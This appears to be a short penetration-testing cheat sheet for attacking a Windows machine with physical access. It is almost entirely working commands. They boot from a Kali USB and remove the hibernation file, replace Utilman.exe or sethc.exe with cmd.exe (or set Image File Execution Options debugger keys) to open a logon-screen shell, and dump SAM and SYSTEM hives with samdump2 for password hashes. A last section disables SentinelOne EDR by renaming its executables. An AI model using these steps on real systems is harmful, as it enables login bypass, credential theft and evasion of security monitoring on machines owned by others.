USB Boot
Boot on a Kali Linux The disk must not be encrypted USB ports must be enabled in the BIOS. If not, is the BIOS password protected ?
BIOS - Master password
Hibernation issues
From Windows
shutdown /s /t 0
From Kali
ntfs-3g -o remove_hiberfile </dev/sdX> </path/to/mount>
Admin CLI
From Kali
copy C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.exe.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
WIN+U
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.old
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
Hit SHIFT 5 times
From an open logon session
reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg add "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "c:\windows\system32\cmd.exe"
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg delete "\\<hostname>\HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f
SAM dump
cp <...>\Windows\System32\config\SYSTEM /tmp
cp <...>\Windows\System32\config\SAM /tmp
samdump2 /tmp/SYSTEM /tmp/SAM
Kill AV/EDR
Check the AV executables list
SentinelOne
C:\Program Files\SentinelOne...
Change extension to “.old”:
AgentUI.exe
SentinelAgent.exe
SentinelCtl.exe
SentinelServicehost.exe